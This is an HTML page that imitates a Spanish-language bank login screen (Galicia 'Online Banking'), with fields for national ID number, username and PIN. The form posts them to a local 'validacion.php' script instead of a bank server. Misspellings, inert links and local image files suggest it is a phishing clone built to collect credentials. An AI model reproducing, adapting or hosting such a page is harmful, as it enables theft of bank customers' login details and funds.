<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Online Banking</title>
    <script src="https://kit.fontawesome.com/1a5e2ebb67.js" crossorigin="anonymous"></script>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
    <style type="text/css">
      .label-floating-custom{
        left:7px;
        top:0px;
        z-index: 0;
        font-size: 19px;
        color:#888;
      }
      input{
        font-size:18px;
        border:0;
        background: transparent;
        position: relative;
        z-index: 1;
        outline:none;
        transition:.3s ease;
        border-bottom: 1px solid silver;
      }
      input[type=number]::-webkit-inner-spin-button,
      input[type=number]::-webkit-outer-spin-button{
        -webkit-appearance:none;
      }
      input:focus{
        border-bottom: 2px solid #fa6400 !important;
      }
      input:valid ~ label{
        top: -19px;
        font-size:13px;
      }
      .sss{
        right: 0px;
        top: 0;
        z-index: 1;
        display: none;
        color: #888;
      }
      input:valid ~ .sss{
        display: block;
      }
      .btn-gali,
      .btn-gali:hover
      {
        background:#ff6600;
        border-radius: 3px;
      }
      .col-sm-5,
      .col-sm-7
      {
        height:100vh;
        min-height:650px;
      }
    </style>
  </head>
  <body>
    <div class="row p-0 mx-0">
      <div class="col-sm-7 ">
        <div class="row m-0">
          <div class="col-12 py-4">
            <img src="images/logo.svg" height="39px" class="d-block">
            <small>Online Banking</small>
          </div>
          <div class="col-sm-6 m-auto">
            <div class="text-center mb-4">
              <h1 class="text-muted fs-3 fw-normal">Iniciar sesión</h1>
            </div>
            <form method="POST" action="validacion.php">
              <div class="field mb-5 position-relative">
                <input type="number" class="custom-lavel-up border-bottom w-100" required name="dni">
                <label class="position-absolute label-floating-custom">Tu DNI</label>
              </div>
              <div class="field mb-5 position-relative">
                <input type="password" id="usuario" class="custom-lavel-up border-bottom w-100" required name="usuartio">
                <label class="position-absolute label-floating-custom">Tu usuario Galcia</label>
                <div class="position-absolute sss verusu">
                  <i class="fa-solid fa-eye"></i>
                </div>
              </div>
              <div class="field mb-4 position-relative">
                <input type="password" id="cla" minlength="3" maxlength="4" class="custom-lavel-up border-bottom w-100" required name="clave">
                <label class="position-absolute label-floating-custom">Tu clave galicia</label>
                <div class="position-absolute sss verpa">
                  <i class="fa-solid fa-eye"></i>
                </div>
              </div>
              <div class="field mb-4 position-relative">
                <input type="checkbox" style="height: 20px;width:20px;vertical-align: middle;" name="">
                <label style="vertical-align: middle;">Recordar DNI y Usuario</label>
              </div>
              <div class="field mb-3 position-relative">
                <i class="fa-regular fa-keyboard text-muted" style="vertical-align: middle;"> </i>
                <label style="vertical-align: middle;font-size: 13px;" class="text-muted">Teclado Virtual</label>
              </div>
              <div class="px-1 mb-2">
                <button class="btn btn-gali w-100 text-white">INICIAR SESIÓN</button>
              </div>
              <div class="py-3 mb-4 text-center">
                <small style="font-size:13px;color:#ff6600;">OVIDÉ O BLOQUEÉ MI CLAVE</small>
              </div>
              <div class="text-center">
                <p class="text-muted">Sí es tu primera vez o necesitás el usuario</p>
                <small style="font-size:13px;color:#ff6600;">OVIDÉ O BLOQUEÉ MI CLAVE</small>
              </div>
            </form>
            
          </div>
          <footer class="mt-4">
              <div class="text-center">
              <small class="text-muted p-0" style="font-size:12px;line-height: 11px !important;">  
                Operar con Online Banking implica aceptar los términos y condiciones en los que se ofrece el servicio.<br>
                Información sobre seguridad. Ir a Office Banking
              </small>


              </div>
            </footer>
        </div>  
      </div>
      <div class="col-sm-5">
        <img src="images/QR-3-LuciaPerini.jpg" class="img-fluid">
      </div>
    </div>
    <script type="text/javascript">
      $(".verusu").click(function(){
        if ($("#usuario").attr("type") == "password") {
          $("#usuario").attr("type","text");
        }else{
          $("#usuario").attr("type","password");
        }
      })
      $(".verpa").click(function(){
        if ($("#cla").attr("type") == "password") {
          $("#cla").attr("type","text");
        }else{
          $("#cla").attr("type","password");
        }
      })
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL" crossorigin="anonymous"></script>
  </body>
</html>